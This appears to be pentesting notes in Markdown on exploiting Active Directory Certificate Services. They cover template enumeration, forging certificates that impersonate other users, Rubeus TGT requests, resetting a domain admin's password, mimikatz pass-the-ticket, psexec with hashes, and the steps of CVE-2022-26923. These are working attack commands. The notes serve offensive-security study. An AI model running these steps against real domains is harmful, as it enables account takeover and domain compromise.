107 lines
4.5 KiB
Markdown
107 lines
4.5 KiB
Markdown
## Active Directory Certificate Service ADCS
|
|
|
|
* Internal CA
|
|
* PKI
|
|
* File system encryption
|
|
* Digital signatures
|
|
* User authentication
|
|
|
|
* __Certificates will not be revoked after account password reset__
|
|
|
|
## Certificate Templates
|
|
|
|
* Extended/Enhanced Key Usage (EKU)
|
|
* Parameter combination can be exploited
|
|
* User Certificates may be requested from a member of a Domain User Group
|
|
* Machine Certifcates may be requested from a host of a Domain Computer Group
|
|
|
|
### Enumeration
|
|
|
|
* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
|
|
|
|
```sh
|
|
certutil -v -template > ct.txt
|
|
```
|
|
|
|
Exploitable templates should have the following traits:
|
|
* `Allow Enroll` or `Allow Full Control` permissions to request certificate
|
|
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
|
|
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
|
|
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
|
|
|
|
#### Certify
|
|
|
|
Find information about all registered CAs. For a start take a look at least at
|
|
```sh
|
|
Certify.exe find /vulnerable
|
|
```
|
|
|
|
|
|
### Certificate Creation
|
|
|
|
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
|
|
* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
|
|
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
|
|
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
|
|
|
|
An alternative is certipy-ad
|
|
|
|
#### Certipy-AD
|
|
|
|
First `pip install certipy-ad`
|
|
Take a look at the Documentation provided in the [git repositories'
|
|
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
|
|
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
|
|
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
|
|
|
|
### Impersonation
|
|
|
|
Request TGT with the created cert.
|
|
|
|
#### On the target machine via
|
|
```sh
|
|
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
|
|
```
|
|
Select a domain admin via opening `Active Directory Users and Computers`
|
|
```sh
|
|
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
|
|
```
|
|
* `runas /user:<domain>\<username of DA> cmd.exe`
|
|
|
|
* Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain
|
|
```sh
|
|
privilege::debug
|
|
kerberos::ptt <name of file to write TGT to.kirbi>
|
|
exit
|
|
dir \\<domain>\<dir>$\
|
|
```
|
|
|
|
#### On the attacking machine
|
|
|
|
Use impacket's psexec
|
|
```sh
|
|
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
|
|
```
|
|
|
|
## CVE-2022-26923
|
|
|
|
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
|
|
* User and Machine certificate templates
|
|
* User Principal Name is used for `SAN`, this template can not be modified in a way to escalate privileges
|
|
* Computer accounts DNS name is used for `SAN`
|
|
* Users of the Authenticated Users Group can create 10 Machine Certificates
|
|
* __DNS hostname__ is used for authentication
|
|
* __Service Principal Names (SPN)__, associates a service logon with a service instance. SPNs are unique
|
|
* Permissions of interest, all two are needed
|
|
* Validate write to DNS hostname allows to update DNS hostname of AD object associated with the host
|
|
* Validate write to SPN, update SPN of the AD object associated with the host
|
|
|
|
### Usage
|
|
|
|
* User account has to be compromised, use it to enrol a new host on the domain
|
|
* Alter the DNS hostname attribute of the AD Object to one of a Domain Controller or other higher privilege
|
|
* Remove the SPN attribute to bypass the unique SPN
|
|
* With the default template request the machine cert
|
|
* authenticate via Kerberos with the template as the higher privileged machine
|
|
|